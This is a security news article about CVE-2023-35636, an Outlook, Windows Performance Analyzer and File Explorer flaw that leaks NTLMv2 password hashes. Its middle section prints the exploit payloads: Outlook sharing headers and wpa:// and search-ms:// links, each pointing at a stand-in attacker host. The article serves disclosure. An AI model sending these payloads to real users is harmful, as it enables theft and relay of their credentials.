Thursday, October 10, 2024
Homecyber securityNew Outlook Flaw Let Attackers Access Hashed Passwords

New Outlook Flaw Let Attackers Access Hashed Passwords

Published on

A new Outlook vulnerability that can be used to extract NTLMv2 hashes by exploiting Outlook, Windows Performance Analyzer (WPA), and Windows File Explorer has been identified.

This vulnerability has been assigned with CVE-2023-35636, and the severity has been given as 6.5 (Medium).

This vulnerability was reported to Microsoft in July 2023, and they took action by patching the WPA and File Explorer with “Moderate Severity.”

- Advertisement - EHA

Microsoft has completely patched this vulnerability in December 2023. However, unpatched systems are still vulnerable to exploitation and stealing of hashed passwords.

Outlook Flaw – CVE-2023-35636

This vulnerability is an exploit of the calendar-sharing function in Outlook, which, if two additional headers are added, can result in directing Outlook to connect and share content to an external machine. This connectivity can further be utilized for intercepting NTLMv2 hash.

Suppose an attacker is successful in extracting NTLM v3 hashes. In that case, there are two possible methods of attack, which are Offline brute-force attacks, which can reveal the original password, and authentication relay attacks, in which an authentication request to a server can be manipulated by the attacker with the NTLMv2 hash and get authenticated to the server under the name of the victim. 

Example exploitation (Source: Varonis)

Leaking of NTLM v2 hashes using Outlook

Outlook serves as the email and calendar tool for the Microsoft 365 suite, which is used by millions of people and organizations worldwide.

One of its prime features is the sharing of calendars between users, which can be exploited to trigger an attempt for authentication that can result in redirecting the hashed password to the attacker’s server.

The headers that can be used for exploitation are,

  • “Content-Class” = “Sharing” — tells Outlook that this email contains sharing content.
  • “x-sharing-config-url” = \\(Attacker machine)\a.ics — points the victim’s Outlook to the attacker’s machine.

Leaking NTLM v2 Hashes using URI Handlers

Windows Performance Analyzer (WPA), the default feature in Windows, performs an action to install a URI handler for WPA:// by default, which enables the program to launch automatically when a user clicks on a WPA-related link. 

Moreover, this feature uses NTLM v2 hashes for authentication over the open web. This makes it vulnerable to relay and offline brute-force attacks.

To exploit this WPA, the threat actor can send a payload that will have three parts. 

Full payload:

wpa:////<attacker IP>/bla
wpa:// — tells the operating system that this link should open in WPA.
//<attacker IP> — tells the victim’s machine to access the attacker’s machine via SMB.
/bla — tells the victim’s machine which file to access.

Leaking NTLM v2 Hashes using Windows File Explorer

There is a URI handle “search-ms” that activates the explorer.exe’s search feature and points the explorer.exe process to the web. This explorer.exe is one of the most powerful processes in the Windows Operating system, which has several capabilities to browse files and folders, copy and move files, and create and delete folders.

However, as part of the exploitation, there were two parameters identified as part of Microsoft’s documentation: “subquery” and “crumb”. For exploitation with the “subquery” parameter, the below payload can be used

  • search-ms://query=poc&subquery=\\(Attacker machine)\poc.search-ms
  • search-ms:// – tells the operating system that this link should open in exe.
  • query=poc – Fake search query
  • &subquery=\\(Attacker machine)\poc.search-ms — Path to .search-ms file.

For exploitation with the “crumb” parameter, the below payload can be used,

search-ms://query=poc&crumb=location:\\(Attacker machine)

  • search-ms:// – tells the operating system that this link should open in exe.
  • query=poc – Fake search query
  • crumb=location:\\(Attacker machine) — The location property under the crumb parameter allows the user to specify a path for the search. 

Furthermore, a complete report has been published, providing detailed information about the attack scenarios, exploitation methods, etc.

Try Kelltron’s cost-effective penetration testing services to evaluate digital systems security. available.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Mozilla Warns Of Firefox Zero-Day Actively Exploited In Cyber Attacks

A critical use-after-free vulnerability affecting Firefox and Firefox Extended Support Release (ESR) is being...

SpyCloud Embeds Identity Analytics in Cybercrime Investigations Solution to Accelerate Insider and Supply Chain Risk Analysis & Threat Actor Attribution

IDLink, SpyCloud’s new automated digital identity correlation capability, is now core to its industry-leading...

Abusix and Red Sift Form New Partnership, Leveraging Automation to Mitigate Cyber Attacks

The agreement has marked over 600,000 fraudulent domains for takedown in just two months...

Hackers Exploiting Zero-day Flaw in Qualcomm Chips to Attack Android Users

Hackers exploit a zero-day vulnerability found in Qualcomm chipsets, potentially affecting millions worldwide.The flaw,...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Mozilla Warns Of Firefox Zero-Day Actively Exploited In Cyber Attacks

A critical use-after-free vulnerability affecting Firefox and Firefox Extended Support Release (ESR) is being...

Multiple VMware NSX Vulnerabilities Let Attackers Gain Root Access

VMware has disclosed multiple vulnerabilities in its NSX product line that could potentially allow...

CISA Warns of Fortinet & Ivanti Vulnerabilities Exploited in Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities...